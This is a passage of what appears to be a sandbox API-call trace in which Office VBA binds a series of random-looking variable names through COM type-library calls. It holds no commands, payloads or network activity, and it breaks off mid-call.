[0069.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11e4e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_ExDACAx") returned 15 [0069.255] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ExDACAx", lHashVal=0x1050a6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x43004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x43004100000000, pDummy=0x0) returned 0x0 [0069.256] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62f6e | out: _Dst=0x144ec0) returned 0x0 [0069.256] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HAD_4_", lHashVal=0x10e4f0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62fbe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HAD_4_") returned 7 [0069.256] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HAD_4_", lHashVal=0x10e4f0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62fbe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HAD_4_") returned 7 [0069.256] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HAD_4_", lHashVal=0x10e4f0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HAD_4_") returned 0x10e4f0 [0069.256] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="HAD_4_" | out: _Dst="HAD_4_") returned 0x0 [0069.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="HAD_4_") returned 7 [0069.256] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.256] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HAD_4_", lHashVal=0x10e4f0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.256] IUnknown:Release (This=0x665ba50) returned 0xd [0069.256] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.256] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HAD_4_", lHashVal=0x10e4f0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.256] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.256] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.257] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HAD_4_", lHashVal=0x10e4f0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.257] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.257] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.257] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HAD_4_", lHashVal=0x10e4f0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.257] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62fbe, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HAD_4_") returned 7 [0069.257] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HAD_4_", lHashVal=0x10e4f0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.257] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.257] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a62fbe | out: _Dst=0x67c2d40) returned 0x0 [0069.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HAD_4_") returned 0x105f5a [0069.257] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_HAD_4_" | out: _Dst="_B_var_HAD_4_") returned 0x0 [0069.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_HAD_4_") returned 14 [0069.257] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.257] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HAD_4_", lHashVal=0x105f5a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.257] IUnknown:Release (This=0x665ba50) returned 0xd [0069.257] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.257] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HAD_4_", lHashVal=0x105f5a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.257] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.257] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.257] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HAD_4_", lHashVal=0x105f5a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.257] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.257] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.257] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HAD_4_", lHashVal=0x105f5a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.257] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.257] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.257] IUnknown:Release (This=0x665ba50) returned 0xd [0069.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11e7e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_HAD_4_") returned 14 [0069.258] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HAD_4_", lHashVal=0x105f5a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x34005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x34005f00000000, pDummy=0x0) returned 0x0 [0069.258] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a62fbe | out: _Dst=0x144ec0) returned 0x0 [0069.258] ITypeComp:RemoteBind (in: This=0x665ba60, szName="iGBAAkx", lHashVal=0x109d72, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62f96, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iGBAAkx") returned 8 [0069.258] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="iGBAAkx", lHashVal=0x109d72, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62f96, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iGBAAkx") returned 8 [0069.258] ITypeComp:RemoteBind (in: This=0x665bd30, szName="iGBAAkx", lHashVal=0x109d72, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iGBAAkx") returned 0x109d72 [0069.258] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="iGBAAkx" | out: _Dst="iGBAAkx") returned 0x0 [0069.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="iGBAAkx") returned 8 [0069.258] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.258] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="iGBAAkx", lHashVal=0x109d72, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.258] IUnknown:Release (This=0x665ba50) returned 0xd [0069.258] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.258] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="iGBAAkx", lHashVal=0x109d72, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.259] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.259] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.259] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="iGBAAkx", lHashVal=0x109d72, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.259] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.259] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.259] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="iGBAAkx", lHashVal=0x109d72, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.259] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62f96, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iGBAAkx") returned 8 [0069.259] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="iGBAAkx", lHashVal=0x109d72, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.259] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.259] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62f96 | out: _Dst=0x67c2d40) returned 0x0 [0069.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_iGBAAkx") returned 0x10a0f6 [0069.259] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_iGBAAkx" | out: _Dst="_B_var_iGBAAkx") returned 0x0 [0069.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_iGBAAkx") returned 15 [0069.259] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.259] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_iGBAAkx", lHashVal=0x10a0f6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.259] IUnknown:Release (This=0x665ba50) returned 0xd [0069.259] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.259] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_iGBAAkx", lHashVal=0x10a0f6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.259] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.259] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.259] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_iGBAAkx", lHashVal=0x10a0f6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.260] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.260] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.260] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_iGBAAkx", lHashVal=0x10a0f6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.260] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.260] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.260] IUnknown:Release (This=0x665ba50) returned 0xd [0069.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11eae, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_iGBAAkx") returned 15 [0069.260] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_iGBAAkx", lHashVal=0x10a0f6, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.260] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62f96 | out: _Dst=0x144ec0) returned 0x0 [0069.260] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KDBoAA", lHashVal=0x10ffb2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8001e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KDBoAA") returned 7 [0069.260] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KDBoAA", lHashVal=0x10ffb2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8001e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KDBoAA") returned 7 [0069.260] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KDBoAA", lHashVal=0x10ffb2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KDBoAA") returned 0x10ffb2 [0069.261] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="KDBoAA" | out: _Dst="KDBoAA") returned 0x0 [0069.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="KDBoAA") returned 7 [0069.261] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.261] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KDBoAA", lHashVal=0x10ffb2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.261] IUnknown:Release (This=0x665ba50) returned 0xd [0069.261] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.261] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KDBoAA", lHashVal=0x10ffb2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.261] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.261] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.261] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KDBoAA", lHashVal=0x10ffb2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.261] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.261] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.261] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KDBoAA", lHashVal=0x10ffb2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.261] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8001e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KDBoAA") returned 7 [0069.261] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KDBoAA", lHashVal=0x10ffb2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.261] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.261] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8001e | out: _Dst=0x67c2d40) returned 0x0 [0069.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KDBoAA") returned 0x107a1c [0069.261] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_KDBoAA" | out: _Dst="_B_var_KDBoAA") returned 0x0 [0069.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_KDBoAA") returned 14 [0069.261] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.262] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KDBoAA", lHashVal=0x107a1c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.262] IUnknown:Release (This=0x665ba50) returned 0xd [0069.262] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.262] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KDBoAA", lHashVal=0x107a1c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.262] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.262] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.262] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KDBoAA", lHashVal=0x107a1c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.262] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.262] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.262] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KDBoAA", lHashVal=0x107a1c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.262] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.262] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.262] IUnknown:Release (This=0x665ba50) returned 0xd [0069.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11ede, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_KDBoAA") returned 14 [0069.262] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KDBoAA", lHashVal=0x107a1c, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41006f00000000, pDummy=0x0) returned 0x0 [0069.262] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8001e | out: _Dst=0x144ec0) returned 0x0 [0069.263] ITypeComp:RemoteBind (in: This=0x665ba60, szName="vDABZcB", lHashVal=0x1036ec, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80046, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="vDABZcB") returned 8 [0069.263] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="vDABZcB", lHashVal=0x1036ec, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80046, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="vDABZcB") returned 8 [0069.263] ITypeComp:RemoteBind (in: This=0x665bd30, szName="vDABZcB", lHashVal=0x1036ec, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.263] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vDABZcB") returned 0x1036ec [0069.263] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="vDABZcB" | out: _Dst="vDABZcB") returned 0x0 [0069.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="vDABZcB") returned 8 [0069.263] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.263] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="vDABZcB", lHashVal=0x1036ec, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.263] IUnknown:Release (This=0x665ba50) returned 0xd [0069.263] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.263] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="vDABZcB", lHashVal=0x1036ec, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.263] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.263] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.263] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="vDABZcB", lHashVal=0x1036ec, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.263] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.263] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.263] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="vDABZcB", lHashVal=0x1036ec, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.264] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80046, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="vDABZcB") returned 8 [0069.264] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="vDABZcB", lHashVal=0x1036ec, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.264] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.264] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80046 | out: _Dst=0x67c2d40) returned 0x0 [0069.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_vDABZcB") returned 0x103a70 [0069.264] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_vDABZcB" | out: _Dst="_B_var_vDABZcB") returned 0x0 [0069.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 